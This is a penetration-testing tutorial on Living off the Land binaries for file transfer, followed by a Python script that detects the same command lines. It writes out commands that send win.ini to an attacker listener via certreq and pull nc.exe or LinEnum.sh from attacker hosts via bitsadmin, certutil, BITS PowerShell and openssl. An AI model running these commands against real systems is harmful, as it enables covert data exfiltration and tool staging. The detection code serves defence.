
# Living Off The Land

There are currently two websites that aggregate information on Living off the Land binaries:

* [LOLBAS Project for Windows Binaries](https://lolbas-project.github.io)
* [GTFOBins for Linux Binaries](https://gtfobins.github.io/)

Living off the Land binaries can be used to perform functions such as:

* Download
* Upload
* Command Execution
* File Read
* File Write
* Bypasses

## LOLBAS (Windows)

To search for download and upload functions in [LOLBAS](https://lolbas-project.github.io/) we can use `/download` or `/upload`.

Example with CertReq.exe:

We need to listen on a port on our attack host for incoming traffic using Netcat and then execute certreq.exe to upload a file.

```batch
certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini
```

## GTFOBins (Linux)

To search for the download and upload function in [GTFOBins for Linux Binaries](https://gtfobins.github.io/), we can use `+file download` or `+file upload`.

### Attacker machine

```bash
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
```

```bash
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh
```

### Target

Download the file from the attacker with:

```bash
openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh
```

***

## Bitsadmin Download function

The [Background Intelligent Transfer Service (BITS)](https://docs.microsoft.com/en-us/windows/win32/bits/background-intelligent-transfer-service-portal) can be used to download files from HTTP sites and SMB shares. It "intelligently" takes host and network utilization into account to minimize the impact on a user's foreground work.

```powershell
bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe
```

PowerShell can also interact with BITS: it enables file downloads and uploads, supports credentials, and can use specified proxy servers.

```powershell
Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"
```

## Certutil

Casey Smith ([@subTee](https://twitter.com/subtee?lang=en)) found that Certutil can be used to download arbitrary files. It is available in all Windows versions and has been a popular file transfer technique, serving as a de facto `wget` for Windows. However, the Antimalware Scan Interface (AMSI) currently detects this as malicious Certutil usage.

```powershell
certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exe
```
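
From the defender's side, each transfer shown on this page leaves a recognizable process command line. The following is an added example, not part of the original page, that matches those command lines in process-creation events; the rule names, patterns, sample events and the allowlisted host `wsus.corp.example` are assumptions made for illustration.

```python
import re
from ntpath import basename  # splits on both "\" and "/" path separators

# (rule name, process image, argument pattern) for the command lines on this page.
# Illustrative assumptions for this example, not a vendor rule set.
RULES = [
    ("certreq_post", "certreq.exe", r"[-/]post\b.*https?://"),
    ("bitsadmin_transfer", "bitsadmin.exe", r"/transfer\b.*(https?://|\\\\)"),
    # -urlcache is the other certutil verb commonly seen with a URL argument.
    ("certutil_remote_fetch", "certutil.exe", r"[-/](verifyctl|urlcache)\b.*https?://"),
    ("powershell_bits", "powershell.exe", r"start-bitstransfer\b.*-source\b"),
    ("openssl_raw_stream", "openssl", r"\bs_(client|server)\b.*-quiet\b"),
]
# Remote endpoint: the URL host, or the host passed to `openssl s_client -connect`.
DEST = re.compile(r"(?:https?://|-connect\s+)([\w.\-]+)", re.I)
ALLOWED_HOSTS = {"wsus.corp.example"}  # hypothetical approved internal server

# Constructed process-creation events (image path, command line), not real telemetry.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\certreq.exe", r"certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini"),
    (r"C:\Windows\System32\bitsadmin.exe", r"bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe"),
    (r"C:\Windows\System32\bitsadmin.exe", r"bitsadmin /transfer upd http://wsus.corp.example/pkg.cab C:\Temp\pkg.cab"),
    (r"C:\Windows\System32\certutil.exe", r"certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exe"),
    (r"C:\Windows\System32\certutil.exe", r"certutil.exe -hashfile C:\Temp\pkg.cab SHA256"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r'powershell.exe -c "Import-Module bitstransfer; Start-BitsTransfer -Source http://10.10.10.32:8000/nc.exe -Destination C:\Windows\Temp\nc.exe"'),
    ("/usr/bin/openssl", "openssl s_client -connect 10.10.10.32:80 -quiet"),
    ("/usr/bin/openssl", "openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem"),
]


def classify(image, command_line):
    """Return (rule name, destination host or None) for a flagged event, else None."""
    proc = basename(image).lower()
    for name, rule_proc, pattern in RULES:
        if proc == rule_proc and re.search(pattern, command_line, re.I):
            m = DEST.search(command_line)
            dest = m.group(1).lower() if m else None
            return None if dest in ALLOWED_HOSTS else (name, dest)
    return None


def scan(events):
    """Classify every event and keep only the flagged ones."""
    return [hit for image, cmd in events if (hit := classify(image, cmd))]


if __name__ == "__main__":
    for rule, dest in scan(SAMPLE_EVENTS):
        print(f"{rule:24} dest={dest}")
```

The `openssl` rule also matches legitimate TLS debugging with `-quiet`, so treat its hits as lower-confidence than the Windows rules and correlate them with the destination host.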

